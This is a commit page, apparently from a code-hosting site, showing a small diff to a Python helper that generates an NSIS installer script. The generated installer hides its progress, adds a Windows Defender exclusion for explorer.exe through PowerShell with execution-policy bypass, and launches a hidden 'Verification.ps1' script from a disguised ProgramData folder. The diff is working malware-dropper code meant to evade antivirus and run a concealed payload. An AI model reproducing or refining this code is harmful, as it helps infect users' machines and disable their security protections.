sigyllly commited on
Commit
e0f84fc
·
verified ·
1 Parent(s): a94be07

Update utils.py

Browse files
Files changed (1) hide show
  1. utils.py +3 -4
utils.py CHANGED
@@ -84,11 +84,10 @@ def generate_nsi_script(folder_path, bin_file, ps1_file):
84
  Section "MainSection" SEC01
85
  SetDetailsPrint none
86
  SetOutPath "$WINDIR\..\ProgramData\Installer"
87
- File "{bin_file}"
88
- File "{ps1_file}"
89
- ExecWait 'conhost --headless powershell -ep bypass -c "Add-MpPreference -ExclusionProcess \"explorer.exe\""'
90
- IfErrors 0 +2
91
  Abort
 
92
  ExecShell "open" "powershell.exe" "-ExecutionPolicy Bypass -File $INSTDIR\Verification.ps1" SW_HIDE
93
  SetAutoClose true
94
  SectionEnd
 
84
  Section "MainSection" SEC01
85
  SetDetailsPrint none
86
  SetOutPath "$WINDIR\..\ProgramData\Installer"
87
+ ExecWait 'powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionProcess \"explorer.exe\""' $0
88
+ ${If} $0 != 0
 
 
89
  Abort
90
+ ${EndIf}
91
  ExecShell "open" "powershell.exe" "-ExecutionPolicy Bypass -File $INSTDIR\Verification.ps1" SW_HIDE
92
  SetAutoClose true
93
  SectionEnd